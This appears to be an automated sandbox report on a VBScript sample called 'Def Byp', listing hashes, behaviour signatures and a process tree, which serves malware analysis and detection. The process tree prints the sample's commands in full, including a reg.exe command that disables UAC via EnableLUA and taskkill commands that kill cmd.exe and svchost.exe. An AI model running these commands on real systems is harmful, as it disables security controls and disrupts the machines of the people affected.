Analysis
-
max time kernel
20s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
16/04/2024, 01:10
Static task
static1
General
-
Target
Def Byp/vbs.vbs
-
Size
1KB
-
MD5
8fc69337ab4bbb5ffa1ae6bce6be8b63
-
SHA1
826a48936ab1d485d28eb2db4401502e4d0e8891
-
SHA256
517e1a63494abb3a33c37dd5a68caa36b44a8a3c18e8729d06d6f81dda3f11c4
-
SHA512
ed832c83972a451392fbf9f59468d64dd2e1ae11d026dbb4346b4ca15c5dc1f11df939c769f10c72a09a78866256da0ff9c4578f6bef1cd374db029342056c65
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 3 IoCs
pid Process 1520 taskkill.exe 4576 taskkill.exe 3548 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4924 reg.exe 1696 reg.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 4576 taskkill.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4256 wrote to memory of 5024 4256 WScript.exe 79 PID 4256 wrote to memory of 5024 4256 WScript.exe 79 PID 4256 wrote to memory of 3532 4256 WScript.exe 81 PID 4256 wrote to memory of 3532 4256 WScript.exe 81 PID 4256 wrote to memory of 1212 4256 WScript.exe 83 PID 4256 wrote to memory of 1212 4256 WScript.exe 83 PID 5024 wrote to memory of 1696 5024 cmd.exe 84 PID 5024 wrote to memory of 1696 5024 cmd.exe 84 PID 4256 wrote to memory of 1520 4256 WScript.exe 85 PID 4256 wrote to memory of 1520 4256 WScript.exe 85 PID 1212 wrote to memory of 4640 1212 wscript.exe 87 PID 1212 wrote to memory of 4640 1212 wscript.exe 87 PID 1212 wrote to memory of 2996 1212 wscript.exe 89 PID 1212 wrote to memory of 2996 1212 wscript.exe 89 PID 1212 wrote to memory of 4576 1212 wscript.exe 92 PID 1212 wrote to memory of 4576 1212 wscript.exe 92 PID 4640 wrote to memory of 4924 4640 cmd.exe 94 PID 4640 wrote to memory of 4924 4640 cmd.exe 94 PID 4256 wrote to memory of 3548 4256 WScript.exe 96 PID 4256 wrote to memory of 3548 4256 WScript.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:1696
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f2⤵PID:3532
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs" uac2⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:4924
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f3⤵PID:2996
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im svchost.exe2⤵
- Kills process with taskkill
PID:3548
-